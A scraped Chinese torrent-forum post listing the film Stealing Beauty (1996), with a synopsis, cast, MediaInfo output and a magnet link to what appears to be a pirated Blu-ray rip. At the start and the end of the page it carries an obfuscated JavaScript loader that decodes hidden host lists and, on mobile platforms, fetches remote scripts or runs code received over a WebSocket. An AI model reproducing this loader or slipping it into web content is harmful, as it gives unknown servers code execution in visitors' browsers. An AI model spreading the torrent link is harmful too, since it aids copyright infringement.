偷香[中文字幕].Stealing.Beauty.1996.1080p.BluRay.x265.10bit.DTS 4.52GB

版主小s 1月前 1484

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 偷香 / 盗美人 / Dancing by Myself

◎片 名 Stealing Beauty

◎年 代 1996

◎产 地 意大利 / 法国 / 英国

◎类 别 剧情 / 爱情 / 悬疑 / 情色

◎语 言 英语 / 法语 / 德语 / 西班牙语 / 意大利语

◎上映日期 1996-03-29

◎IMDb链接 https://www.imdb.com/title/tt0117737/

◎豆瓣评分 7.7/10 (26092人评价)

◎豆瓣链接 https://movie.douban.com/subject/1292277/

◎片 长 118 分钟

◎导 演 贝纳尔多·贝托鲁奇 Bernardo Bertolucci (id:1035651)

◎编 剧 贝纳尔多·贝托鲁奇 Bernardo Bertolucci (id:1035651)

苏珊·米诺特 Susan Minot (id:1037978)

◎演 员 丽芙·泰勒 Liv Tyler (id:1041027)

杰瑞米·艾恩斯 Jeremy Irons (id:1031216)

西妮德·库萨克 Sinéad Cusack (id:1004776)

让·马雷 Jean Marais (id:1036866)

多纳尔·麦卡恩 Donal McCann (id:1120714)

D.W.莫菲特 D.W. Moffett (id:1119047)

斯特法尼娅·桑德雷利 Stefania Sandrelli (id:1019156)

蕾切尔·薇兹 Rachel Weisz (id:1018989)

卡洛·切基 Carlo Cecchi (id:1078790)

约瑟夫·费因斯 Joseph Fiennes (id:1047983)

杰森·弗莱明 Jason Flemyng (id:1027179)

伊格纳齐奥·欧力瓦 Ignazio Oliva (id:1315407)

弗朗切斯科·西西利亚诺 Francesco Siciliano (id:1297557)

莱昂纳多·特雷维谬 Leonardo Treviglio (id:1160381)

亚历山德拉万齐 Alessandra Vanzi (id:1038925)

罗伯托·齐贝蒂 Roberto Zibetti (id:1165651)

达吕斯·康第 Darius Khondji (id:1028011)

吉亚尼·西尔韦斯特里 Gianni Silvestri (id:1297602)

Domenico Sica Domenico Sica (id:1297556)

Mirella Ginnoto Mirella Ginnoto (id:1284896)

恩里科·雅科波尼 Enrico Jacoponi (id:1287529)

Pasquale Plastino Pasquale Plastino (id:1294609)

Silvia Ranfagni Silvia Ranfagni (id:1295225)

◎标 签 意大利 / 贝托鲁奇 / 爱情 / 情色 / 青春 / 意大利电影 / 法国 / 文艺

◎简 介

年轻的露西(丽芙·泰勒 Liv Tyler 饰)带着她母亲自杀后留下的日记,来到了一个小镇上探访母亲往昔的好友,并住在雕塑家格雷森的家中。其实四年前,露西就和母亲来过这里,还认识了一个叫尼古拉的男孩。她曾经被他送上的一封信深深感动,并和他有过美好的初恋时光。如今,格雷斯家中异常热闹,聚集了各路人物,露西美丽的魅力让这里的男人们纷纷动心,其中患有白血病的作家亚历克斯更是难以自拔。尼古拉从国外回来,露西却发现他是个花花公子,枉费当年动了情。此时寻找生父成了露西的心结。她在这段历程中慢慢成熟,并寻获心爱那人。

◎获奖情况 (共1项)

第49届戛纳电影节 (1996)

主竞赛单元 金棕榈奖(提名)

└──贝纳尔多·贝托鲁奇 (id:1035651)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 164803775592196992423276226988983471627 (0x7BFC0D798F5D382D6B10C62169F84E0B)

  4. Complete name : [email protected]M.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 4.52 GiB

  8. Duration : 1 h 58 min

  9. Overall bit rate : 5 478 kb/s

  10. Encoded date : UTC 2021-10-10 12:56:00

  11. Writing application : mkvmerge v56.1.0 ('My Friend') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  13. Attachments : WenQuanWeiMiHei-1.ttf


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@Main

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 58 min

  21. Bit rate : 4 607 kb/s

  22. Width : 1 920 pixels

  23. Height : 816 pixels

  24. Display aspect ratio : 2.35:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.123

  31. Stream size : 3.80 GiB (84%)

  32. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  33. Encoding settings : rc=crf / crf=19.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x816 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  34. Language : English

  35. Default : Yes

  36. Forced : No


  37. Audio

  38. ID : 2

  39. ID in the original source medium : 4353 (0x1101)

  40. Format : DTS

  41. Format/Info : Digital Theater Systems

  42. Codec ID : A_DTS

  43. Duration : 1 h 58 min

  44. Bit rate mode : Constant

  45. Bit rate : 768 kb/s

  46. Channel(s) : 6 channels

  47. Channel layout : C L R Ls Rs LFE

  48. Sampling rate : 48.0 kHz

  49. Frame rate : 93.750 FPS (512 SPF)

  50. Bit depth : 16 bits

  51. Compression mode : Lossy

  52. Stream size : 649 MiB (14%)

  53. Language : English

  54. Default : Yes

  55. Forced : No

  56. Original source medium : Blu-ray


  57. Text #1

  58. ID : 3

  59. ID in the original source medium : 4611 (0x1203)

  60. Format : PGS

  61. Muxing mode : zlib

  62. Codec ID : S_HDMV/PGS

  63. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  64. Duration : 1 h 56 min

  65. Bit rate : 51.3 kb/s

  66. Count of elements : 3952

  67. Stream size : 42.9 MiB (1%)

  68. Title : chs&eng

  69. Language : Chinese

  70. Default : Yes

  71. Forced : No

  72. Original source medium : Blu-ray


  73. Text #2

  74. ID : 4

  75. ID in the original source medium : 4612 (0x1204)

  76. Format : PGS

  77. Muxing mode : zlib

  78. Codec ID : S_HDMV/PGS

  79. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  80. Duration : 1 h 56 min

  81. Bit rate : 51.6 kb/s

  82. Count of elements : 3952

  83. Stream size : 43.1 MiB (1%)

  84. Title : cht&eng

  85. Language : Chinese

  86. Default : No

  87. Forced : No

  88. Original source medium : Blu-ray


  89. Text #3

  90. ID : 5

  91. ID in the original source medium : 4613 (0x1205)

  92. Format : PGS

  93. Muxing mode : zlib

  94. Codec ID : S_HDMV/PGS

  95. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  96. Duration : 1 h 56 min

  97. Bit rate : 37.8 kb/s

  98. Count of elements : 3952

  99. Stream size : 31.5 MiB (1%)

  100. Title : chs

  101. Language : Chinese

  102. Default : No

  103. Forced : No

  104. Original source medium : Blu-ray


  105. Text #4

  106. ID : 6

  107. ID in the original source medium : 4614 (0x1206)

  108. Format : PGS

  109. Muxing mode : zlib

  110. Codec ID : S_HDMV/PGS

  111. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  112. Duration : 1 h 56 min

  113. Bit rate : 38.1 kb/s

  114. Count of elements : 3952

  115. Stream size : 31.8 MiB (1%)

  116. Title : cht

  117. Language : Chinese

  118. Default : No

  119. Forced : No

  120. Original source medium : Blu-ray


  121. Text #5

  122. ID : 7

  123. Format : ASS

  124. Codec ID : S_TEXT/ASS

  125. Codec ID/Info : Advanced Sub Station Alpha

  126. Duration : 1 h 56 min

  127. Bit rate : 116 b/s

  128. Count of elements : 1480

  129. Compression mode : Lossless

  130. Stream size : 99.8 KiB (0%)

  131. Title : eng

  132. Language : English

  133. Default : No

  134. Forced : No


  135. Menu

  136. 00:00:00.000 : Chapter 01

  137. 00:03:04.142 : Chapter 02

  138. 00:11:04.330 : Chapter 03

  139. 00:19:33.839 : Chapter 04

  140. 00:31:05.196 : Chapter 05

  141. 00:34:56.302 : Chapter 06

  142. 00:40:06.153 : Chapter 07

  143. 00:48:54.181 : Chapter 08

  144. 00:56:34.808 : Chapter 09

  145. 01:01:12.835 : Chapter 10

  146. 01:09:48.642 : Chapter 11

  147. 01:20:40.794 : Chapter 12

  148. 01:28:40.106 : Chapter 13

  149. 01:33:11.961 : Chapter 14

  150. 01:41:28.415 : Chapter 15

  151. 01:48:01.391 : Chapter 16

  152. 01:53:19.000 : Chapter 17




复制代码


TAGS 剧情 情色 悬疑 爱情

磁力链:
  • magnet:?xt=urn:btih:38F855B74EE875779C657C3C114A571C0C98A548

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};